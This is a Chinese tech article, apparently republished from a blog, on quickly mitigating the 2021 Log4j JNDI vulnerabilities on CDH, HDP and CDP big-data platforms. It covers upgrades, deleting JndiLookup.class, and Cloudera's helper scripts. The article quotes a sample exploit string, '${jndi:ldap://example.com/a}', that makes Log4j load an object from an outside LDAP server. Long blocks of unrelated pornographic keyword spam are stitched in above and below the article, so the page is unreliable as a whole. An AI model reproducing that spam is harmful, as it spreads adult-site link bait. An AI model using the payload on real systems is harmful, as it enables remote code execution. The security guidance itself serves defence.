精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Cdh/Hdp/Cdp等大數據平臺中如何快速應對Log4j的Jndi系列漏洞

安全 漏洞
Apache Log4j 是一款基于 Java 的開源日志框架,而 Apache Log4j2 在 Log4j 的基礎上,參考了另一款日志框架 logback,做了大量改進增加了很多豐富的特性。

大家好,我是明哥!

近期 LOG4J 圍繞JNDI的安全漏洞頻繁暴雷,著實讓小伙伴們忙活了一陣。

本文我們就一起來看下,CDH/HDP/CDP 等大數據平臺中如何快速應對 LOG4J 的 JNDI 系列漏洞。

  • 1 LOG4J 概述
  • 2 LOG4J JNDI 系列漏洞概述
  • 3 深入了解 LOG4J 與 JNDI
  • 4 應對 LOG4J JNDI 系列漏洞的思路
  • 5 常見大數據組件如何應對 LOG4J JNDI 系列漏洞
  • 6 CDH/HDP/CDP 等大數據平臺中如何快速應對LOG4J的 JNDI 系列漏洞

1 LOG4J 概述

Apache Log4j 是一款基于 Java 的開源日志框架,而 Apache Log4j2 在 Log4j 的基礎上,參考了另一款日志框架 logback,做了大量改進增加了很多豐富的特性。

在實現上,log4j2 做到了 api seperation, 包括 log4j-core 和 log4j-api, 其中前者是日志框架的具體實現(Logback是日志框架的另一款具體實現),后者則是日志門面/日志抽象 logging facade(Simple Logging Facade for Java (slf4j)是另一款日志門面/日志抽象)。

在性能上,Log4j2 由于使用了 Asynchronous loggers,(應用代碼在調用 Logger.log 時,其實是將 I/O 操作的執行交給了另一個 IO 線程,并立即返回了應用線程),在多線程環境下,可以做到 LOG4J1.X 和 logback 18倍的吞吐量,并有著更低的延遲。

在架構上,log4j2 采用了插件機制,所以用戶不需要額外編寫代碼,即可根據自己的情況配置自己的 Appender/Layout/Pattern Converter, log4j2 會自動識別配置文件并使用其中配置的插件。

正式由于以上諸多優點,log4j 成為了 JAVA 生態中應用最廣泛的日志框架。

2 LOG4J JNDI 系列漏洞概述

近期暴雷的 JNDI 系列漏洞,包括以下三個:

  • CVE-2021-44228:12月9日,由阿里云發現并報告該漏洞,基于該漏洞,攻擊者可以構造惡意請求,觸發遠程代碼執行漏洞;Log4j 團隊在發現該問題后馬上發布了 2.15.0 版本,并給出了臨時解決方案;(危險等級:critical)
  • CVE-2021-45046:12 月 14 日,由 Twitter 公司發現并報告該漏洞,該漏洞表示 2.15.0 中對 CVE-2021-44228 的修復以及給出的臨時解決方案并不完備,在某些配置條件下依然會被利用導致 DOS 攻擊;Log4j 團隊在發現該問題后,又發布了 2.16.0 版本,同時給出了新的臨時解決方案;(危險等級:critical)
  • CVE-2021-45105:12 月 18號,發現并確認了該漏洞,該漏洞進一步表示 2.16.0 版本及 CVE-2021-45046 的臨時修復方案在某些配置條件下依然有被 DOS 攻擊的風險;隨后,Log4j 團隊馬上發布了 2.17.0 版本,并給出了新的臨時修復方案;(危險等級:moderate)

以上 JNDI 系列漏洞,LOG4J2 官方團隊已經修復,概括起來, 針對危險等級為 critical 的 CVE-2021-44228 和 CVE-2021-45046,解決方式如下:

  • Log4j 1.x is not impacted by this vulnerability.
  • log4j2: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
  • log4j2: in any release other than 2.16.0, you may remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
  • log4j2: Users are advised not to enable JNDI in Log4j 2.16.0, since it still allows LDAP connections.

3 深入了解 LOG4J 與 JNDI

以上 JNDI 系列漏洞,其根源都可以追溯到 Log4j 早年間引入的一個 Feature:LOG4J2-313:JNDI Lookup plugin support:2013 年,Log4j 在 2.0-beta9 版本中添加了 “JNDILookup plugin” 功能。

JNDI 其實是 Java 在 1990 年之后引入的一種目錄服務,是 J2EE 的重要組成部分,讓 Java 程序可以以 Java 對象的形式通過目錄查找數據。JNDI 提供了多種 SPI 支持不同的目錄服務,如 CORBA COS (公共對象服務)、Java RMI (遠程方法接口) Registry 和 LDAP (輕量級目錄訪問協議)。

根據 JNDI 官方幫助文檔描述 “如果您的 LDAP 服務器位于另一臺機器上或正在使用另一個端口,那么您需要編輯 LDAP URL”,LDAP 服務器可以在不同的機器上運行,也可以在 Internet 上的任何地方運行。這種靈活性意味著如果攻擊者能夠控制 LDAP URL,他們就能夠讓 Java 程序從他們控制的服務器加載對象。

在 Log4j 包含漏洞的版本中,攻擊者可以通過傳入類似 “${jndi:ldap://example.com/a}” 形式的字符串來控制 Log4j 訪問的 LDAP URL。在這種情況下,Log4j 將連接到 example.com 上的 LDAP 服務器并檢索對象。

更多關于 JNDI 的細節,我們這里不再贅述,有興趣的可以自己做下功課,不過以下要點,跟大家概括下:

  • JNDI 是 J2EE 的重要組成部分,是上個世紀90年代陸續引入的,在 JBoss,WebLogic,WebSphere 等應用容器有大量應用;
  • 在單體架構式微,而微服務架構日益流行的今天,大家普遍采用 Spring boot/spring cloud 技術棧,已經不怎么使用 JNDI 了;(特別是互聯網企業和中小企業,很多同學可能都沒怎么了解過 JNDI);
  • LOG4J 通過 LOG4J2-313 引入的特性 “JNDI Lookup plugin support”,更多是迎合采用了單體架構,使用了 JBoss,WebLogic,WebSphere 等應用容器的大客戶大企業;
  • 在微服務架構中使用LOG4J,絕大部分用戶都使用不到其 “JNDI Lookup plugin support” 功能;
  • 在使用了 LOG4J 的大數據組件中,更是使用不到其“JNDI Lookup plugin support” 功能;

4 應對 LOG4J JNDI 系列漏洞的思路

從根本上講,應對LOG4J JNDI 系列漏洞的思路,正如其官方文檔所述,有以下幾種:

  • Log4j 1.x:該系列版本不受影響,因為還沒有引入上述 LOG4J2-313:JNDI Lookup plugin support;
  • log4j2: 正式的解決方案,是升級版本:分別是升級到 Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later);
  • log4j2: 作為臨時解決方案,可以刪除類加載路徑上的危險類 JndiLookup.class: 除了 2.16.0 外的其它版本,都可以臨時采取這種方案;(本質是因為我們其實沒有使用到 LOG4J 的“JNDI Lookup plugin support” 功能);
  • log4j2: 不啟用 JNDI 功能: 針對 2.16.0 版本,用戶也可以配置不啟用 JNDI 功能,從而避免建立 LDAP連接的潛在可能和風險;(2.16.0 提供了配置項,可以開啟或關閉 JNDI功能,所以不用刪除類加載路徑上的危險類 JndiLookup.class);

所以:

  • 如果大家的應用代碼,直接依賴了LOG4J,就可以靈活 采取上述適合自己的方案,最推薦的當然是升級 LOG4J版本;
  • 如果大家的應用代碼,是通過某個依賴組件間接引入了對 LOG4J的依賴,則可以采用臨時解決方案,即刪除類加載路徑上的危險類 JndiLookup.class;或者,等待該依賴組件官方發布了正式修復版本后,進行升級。

5 常見大數據組件如何應對 LOG4J JNDI 系列漏洞

  • spark: spark 的最新版本是3.2.0,目前其依賴的還是log4j1.2.17,即log4j1.x系列,所以不受上述漏洞影響;
  • flink:flink 各版本使用的 log4j 的版本如下,可以看到,flink1.11 及以后版本受到上述漏洞影響;

  • 所以針對 flink 組件,正式的修復方案是升級flink,目前 flink 社區已經發布了針對 1.11/1.12/1.13/1.14 系列的修復版本,大家可以根據自己的情況,升級到同系列下最新版本即可修復該問題:
  • 得益于 flink 社區快速即使的響應和修復,大家不需要采用各種臨時修復方案了(主要思路是刪除 log4j-core 里的 JndiLooup.class 刪除,以達到禁用 JNDI 的效果)

6 CDH/HDP/CDP 等大數據平臺中如何快速應對LOG4J的 JNDI 系列漏洞

由于 CDH/HDP/CDP 等大數據平臺中,背后的大數據組件眾多,并不是每一個組件背后的社區都能快速響應,修復上述 LOG4J JNDI 系列漏洞并提供正式的修復版本,所以 CDH/HDP/CDP 等大數據平臺中,快速應對LOG4J的JNDI系列漏洞,采用的思路,就是使用上述臨時解決方案,即刪除類加載路徑上的危險類 JndiLookup.class(本質是因為,這些大數據組件底層,都沒有使用到 LOG4J 的“JNDI Lookup plugin support” 功能)。

同時,為進一步簡化臨時解決方案的實施難度,Cloudera 在 GitHub 上提供了系列腳本,來輔助刪除 CDH/HDP/CDP 等大數據平臺上的危險類 JndiLookup.class。

其它大數據平臺,如TDH等,其思路類似,大家可以參考上述腳本,有針對性地修改獲得。

 

大家可以去 GITHUB 自行下載上述腳本,GITHUB 下載鏈接如下:https://github.com/cloudera/cloudera-scripts-for-log4j.git

 

責任編輯:武曉燕 來源: 明哥的IT隨筆
相關推薦

2022-03-25 13:42:15

Log4j漏洞網絡安全

2021-12-23 09:47:36

Log4jRCE漏洞DoS漏洞

2023-11-10 10:08:23

2022-02-13 16:18:57

JetBrainsIntelliJLog4j

2021-12-14 23:44:26

漏洞Log4j項目

2021-12-23 11:03:25

Log4j 漏洞漏洞

2022-01-24 10:02:53

漏洞微軟網絡攻擊

2022-03-30 11:29:53

漏洞補丁Spring

2023-09-26 08:19:16

2021-12-22 16:53:31

Log4jLog4j庫零日漏洞

2021-12-24 09:52:31

Traefik Log4J 漏洞

2021-12-13 01:49:34

漏洞Log4j代碼

2021-12-24 08:00:00

Java漏洞插件

2021-12-29 14:47:43

Apache團隊Log4j漏洞

2022-01-06 09:52:39

Log4j漏洞攻擊

2021-12-11 19:04:38

漏洞

2022-01-02 07:07:55

CISAApache Log4漏洞

2021-12-23 19:20:43

漏洞賞金計劃漏洞log4j

2009-06-12 17:03:51

JBoss和log4j

2021-12-23 16:35:54

Apache Log4
點贊
收藏

51CTO技術棧公眾號

日本欧美加勒比视频| 亚洲一区二区免费在线观看| 国产免费观看久久| 92看片淫黄大片看国产片| 国产精品19乱码一区二区三区| 激情av综合| 欧美性做爰猛烈叫床潮| 精品视频在线观看一区二区| 天堂在线一二区| 蜜桃精品视频在线观看| 欧美激情精品久久久久久久变态| 成人网站免费观看| 亚洲成人高清| 日韩欧美国产黄色| 喜爱夜蒲2在线| 欧美日韩伦理片| 国产大陆a不卡| 国产精品爱啪在线线免费观看| 成人免费视频国产免费观看| 最新国产一区| 精品99一区二区| 第一区免费在线观看| 亚洲欧美一区二区三区| 一区二区三区精品在线观看| 亚洲高清在线播放| 亚洲日本中文字幕在线| 国产在线精品视频| 国产欧美va欧美va香蕉在线| 久草视频免费在线| 性欧美欧美巨大69| 在线观看免费高清视频97| 男人网站在线观看| 秋霞午夜一区二区三区视频| 欧美三区免费完整视频在线观看| 鲁一鲁一鲁一鲁一澡| 青草影视电视剧免费播放在线观看| 欧美激情在线一区二区三区| 精品久久久久久中文字幕动漫| av高清一区二区| 狠狠色丁香婷综合久久| 国产欧美一区二区三区在线看| 国产精品久免费的黄网站| 影音先锋中文字幕一区| 久久97精品久久久久久久不卡| 蜜桃av免费观看| re久久精品视频| 亚洲夜晚福利在线观看| 97伦伦午夜电影理伦片| 欧美精品中文| 日韩经典中文字幕在线观看| 国产综合内射日韩久| 91成人午夜| 欧美大片日本大片免费观看| 伊人精品视频在线观看| av成人在线网站| 91麻豆精品国产91久久久久久| 亚洲va综合va国产va中文| 久久精品超碰| 91麻豆精品国产91久久久 | 99视频在线| 国产suv一区二区| 国产成人无遮挡在线视频| av日韩免费电影| 黄色美女一级片| 95精品视频在线| 青青草成人激情在线| 国产大学生校花援交在线播放| 欧美国产激情一区二区三区蜜月| 在线视频不卡国产| 日本乱理伦在线| 五月天婷婷综合| 久久精品香蕉视频| 日韩免费大片| 日韩欧美亚洲一区二区| 朝桐光av一区二区三区| 亚洲亚洲免费| 久久激情视频免费观看| 国产极品美女高潮无套嗷嗷叫酒店| 在线观看一区| 国产福利精品在线| 精品国产九九九| 2020日本不卡一区二区视频| 一本久久a久久精品vr综合 | 成人一级毛片| 欧美大码xxxx| 国产精品人人人人| 精品一区二区三区久久| 粉嫩高清一区二区三区精品视频| 天堂а√在线8种子蜜桃视频| 欧美国产日韩a欧美在线观看 | 国新精品乱码一区二区三区18| 污视频在线免费| 欧美激情一区二区三区蜜桃视频 | 91精选在线观看| 欧美日韩一区二区三区四区五区六区| 一道本一区二区三区| zzjj国产精品一区二区| 日本道在线观看| 精久久久久久久久久久| 久久国产精品免费一区| 麻豆传媒在线观看| 日韩欧美中文在线| 特种兵之深入敌后| 精品国产91| 久久欧美在线电影| 91亚洲精品国偷拍自产在线观看 | 日韩精品乱码免费| av一本久道久久波多野结衣| 国产永久免费高清在线观看| 亚洲一区二区三区四区在线免费观看 | 91在线品视觉盛宴免费| 亚洲一区二区综合| 色www免费视频| 亚洲婷婷伊人| 久久久久久久91| 亚洲天堂网在线观看视频| 91免费版在线| 久青草视频在线播放| 男女啪啪999亚洲精品| 国产丝袜一区二区| 国产在线欧美在线| 国产高清精品网站| 一本色道久久综合亚洲二区三区| 涩涩av在线| 亚洲第一精品福利| 欧美日韩一级在线观看| 久久99国内精品| 亚洲国产一区二区在线| 小草在线视频免费播放| 精品国产91乱码一区二区三区| 夫妻性生活毛片| 蜜臀久久99精品久久久久宅男| 久久艳妇乳肉豪妇荡乳av| h片精品在线观看| 日韩一区二区在线观看视频| 中文字幕乱码av| 男女激情视频一区| 亚洲二区自拍| 日韩经典一区| 中文一区二区视频| 中文字幕一区二区人妻痴汉电车| 久久久久久99精品| 女人另类性混交zo| 欧美极品中文字幕| 国产成人a亚洲精品| 国模精品一区二区| 一本在线高清不卡dvd| 人人妻人人澡人人爽人人精品| 99热免费精品| 九9re精品视频在线观看re6| а√在线中文在线新版| 亚洲国产天堂久久综合| 日本午夜视频在线观看| 久久夜色精品国产欧美乱极品| 黄色免费视频大全| 美日韩中文字幕| 国产精品久久久久久久9999| av中文字幕在线| 欧美日韩视频一区二区| 中国一级片在线观看| 国产精品一区二区男女羞羞无遮挡 | 黄色精品在线看| 国产熟女高潮一区二区三区| 午夜在线一区二区| 日韩高清av电影| 四虎影视成人精品国库在线观看| 久久精品免费电影| 亚洲成人av综合| 欧美日韩中文字幕在线| 91激情视频在线观看| 久久成人av少妇免费| 欧美亚洲色图视频| 亚洲最大在线| 国产精品一区二区三| 在线你懂的视频| 精品偷拍各种wc美女嘘嘘| 黄色av一区二区| 亚洲欧美aⅴ...| 成人性生活免费看| 日本sm残虐另类| www.男人天堂网| 国产欧美日韩精品一区二区免费| 国产欧美精品日韩精品| 欧美78videosex性欧美| 亚洲免费小视频| 国产精品乱码一区二区| 精品久久久久久亚洲国产300| 久久婷婷五月综合| 国产99一区视频免费| 日韩人妻精品无码一区二区三区| 999精品视频| 国产无套精品一区二区| 久久夜夜久久| 51精品在线观看| 精品黄色免费中文电影在线播放| 亚洲国产欧美一区| 一级久久久久久久| 欧美色图在线视频| 久久久夜色精品| 中文字幕电影一区| 亚洲调教欧美在线| 国产剧情av麻豆香蕉精品| 国产精品涩涩涩视频网站| 国产一在线精品一区在线观看| 日本视频精品一区| 动漫视频在线一区| 成人免费高清完整版在线观看| 成人免费看黄| 欧美激情视频播放| 免费观看成人高潮| 亚洲性无码av在线| 天天干免费视频| 日韩免费观看高清完整版 | 国产成人亚洲综合色影视| 国产一级不卡毛片| 一本色道久久精品| 少妇大叫太大太粗太爽了a片小说| 日韩欧美三级| 欧美黑人3p| 女同久久另类99精品国产| 51精品国产人成在线观看| 亚洲成人高清| 国产精品一区二区三| 欧美aaa大片视频一二区| 欧美性受xxx| 51精品在线| 久久理论片午夜琪琪电影网| dy888亚洲精品一区二区三区| 一区二区三区精品99久久| 日韩电影网址| 亚洲男子天堂网| 日韩福利一区二区| 亚洲码在线观看| 日本不卡视频一区二区| 精品小视频在线| 色香蕉在线视频| 亚洲加勒比久久88色综合| 亚洲AV无码乱码国产精品牛牛| 欧美一区二区三区日韩| 一级黄色短视频| 欧美高清你懂得| 国产精品一区二区av白丝下载| 欧美日韩一级片在线观看| 中文文字幕一区二区三三| 日本高清成人免费播放| 无码一区二区三区| 91福利在线导航| 中文字幕av资源| 欧美日韩国产一区| 国产精品亚洲lv粉色| 欧美高清www午色夜在线视频| 国产又粗又黄又爽| 日韩午夜电影在线观看| 国产高清免费av| 亚洲精品一区二区三区99| 黄色小视频免费在线观看| 亚洲黄色av女优在线观看| 视频福利在线| 国产一区二区三区四区福利| 91ph在线| 欧美激情精品久久久| av资源在线播放| 日韩av电影在线播放| 久久爱.com| 99蜜桃在线观看免费视频网站| 成人涩涩网站| 欧美一区二区高清在线观看| 999国产精品999久久久久久| 国产免费裸体视频| 六月婷婷一区| 亚洲黄色av片| av电影天堂一区二区在线| 天堂久久精品忘忧草| 亚洲欧美在线另类| 日本在线视频免费观看| 在线观看国产91| 国产高清视频免费| 国产视频精品免费播放| 在线观看二区| 久久免费视频网| 国产成人精品一区二区三区视频| 91九色视频在线观看| 亚洲精品国模| 欧美a级黄色大片| 久久久久免费| 中文字幕久久久久久久| 久久久久久麻豆| 一区二区视频免费看| 一本久久综合亚洲鲁鲁五月天| 国产视频手机在线观看| 亚洲免费av电影| www.欧美日本韩国| 国产999在线观看| 亚洲日本va| 先锋影音网一区| 99国产精品| www.桃色.com| 久久久精品日韩欧美| 三级影片在线看| 欧美吻胸吃奶大尺度电影| 日韩在线观看视频一区二区三区| 中文字幕亚洲欧美日韩2019| av中文在线资源库| 成人黄色在线播放| 久操成人av| 日韩精品一区在线视频| 激情综合色丁香一区二区| 国产国语性生话播放| 亚洲男人的天堂在线观看| 成年人视频免费| 亚洲精品720p| 午夜小视频在线观看| 国产欧美日韩中文字幕在线| 国产精品高潮呻吟久久久久| 国产精品亚洲天堂| 日本特黄久久久高潮| 中文幕无线码中文字蜜桃| 亚洲成人av在线电影| 国产黄a三级三级看三级| 日韩在线视频线视频免费网站| 亚洲女色av| 久久99热只有频精品91密拍| 国产精品theporn| 亚洲高清av一区二区三区| 亚洲欧美在线另类| 亚洲天堂视频网| 日韩专区中文字幕| 97成人超碰| 色综合视频二区偷拍在线| 爽好多水快深点欧美视频| 泷泽萝拉在线播放| 韩曰欧美视频免费观看| 日韩一级片免费| 国内精品久久久久久影视8| av成人资源网| 隔壁人妻偷人bd中字| 国产精品1区2区| 久久久99精品| 欧美精品一区二区三区一线天视频 | 亚洲国产精彩视频| 欧美乱大交做爰xxxⅹ性3| 欧美日韩黄色| 国产在线观看欧美| 顶级嫩模精品视频在线看| 免费在线观看亚洲| 欧美成人一级视频| 9765激情中文在线| 久久99精品久久久久久青青日本| 国产毛片久久| 无码人妻精品一区二区中文| 欧美性做爰猛烈叫床潮| 色网站免费在线观看| 亚洲精品欧美日韩专区| 国产一区二区三区自拍| 强迫凌虐淫辱の牝奴在线观看| 精品久久久久久中文字幕一区奶水| 日韩精品123| 国产精品午夜视频| 中文字幕乱码亚洲无线精品一区| 日本中文字幕有码| 图片区日韩欧美亚洲| 国产在线观看免费网站| 成人激情电影一区二区| 激情久久婷婷| 91成年人网站| 在线播放/欧美激情| 久草在线新免费首页资源站| 精品国产综合久久| 免费在线观看精品| 黄色一级免费视频| 亚洲精品在线视频| 久久青草免费| 欧美日韩性生活片| 国产精品麻豆欧美日韩ww| 亚洲国产精品久久久久久久| 青青草精品毛片| 久久久久午夜电影| www.日本高清| 欧美日本国产视频| 182在线视频观看| 神马影院午夜我不卡影院| 国产精品99久久久久久久vr| 青青青国产在线| 精品国产拍在线观看| 欧美国产极品| 免费成人黄色大片| 欧美日韩国产激情| 黄色免费在线观看网站| 国产综合 伊人色| 麻豆高清免费国产一区| xxxxxx国产| www.亚洲免费视频| 亚洲第一福利社区| 性色av浪潮av| 欧美午夜精品一区二区三区| 波多野结衣在线播放| 亚洲永久一区二区三区在线| 不卡av电影在线播放| 国产欧美久久久精品免费| 日韩美女视频中文字幕|